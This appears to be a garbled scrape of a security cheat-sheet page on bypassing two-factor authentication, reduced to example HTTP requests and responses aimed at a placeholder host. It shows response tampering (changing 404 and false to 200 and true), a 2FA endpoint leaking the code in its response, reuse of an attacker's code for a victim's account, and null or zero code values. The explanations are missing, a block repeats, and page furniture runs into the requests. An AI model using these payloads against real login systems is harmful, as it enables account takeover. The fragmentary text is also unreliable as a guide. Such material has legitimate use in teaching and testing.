Bypass Two-Factor Authentication
HTTP/1.1 404 Not Found
...
{"code": false}HTTP/1.1 404 Not Found
...
{"code": true}HTTP/1.1 404 Not Found
...
{"code": false}HTTP/1.1 200 OK
...
{"code": false}References
Last updated
HTTP/1.1 404 Not Found
...
{"code": false}HTTP/1.1 404 Not Found
...
{"code": true}HTTP/1.1 404 Not Found
...
{"code": false}HTTP/1.1 200 OK
...
{"code": false}Last updated
POST /req-2fa/
Host: vuln.com
...
email=victim@gmail.comHTTP/1.1 200 OK
...
{"email": "victim@gmail.com", "code": "101010"}POST /2fa/
Host: vuln.com
...
email=attacker@gmail.com&code=382923POST /2fa/
Host: vuln.com
...
email=victim@gmail.com&code=382923POST /2fa/
Host: vuln.com
...
code=00000POST /2fa/
Host: vuln.com
...
code=null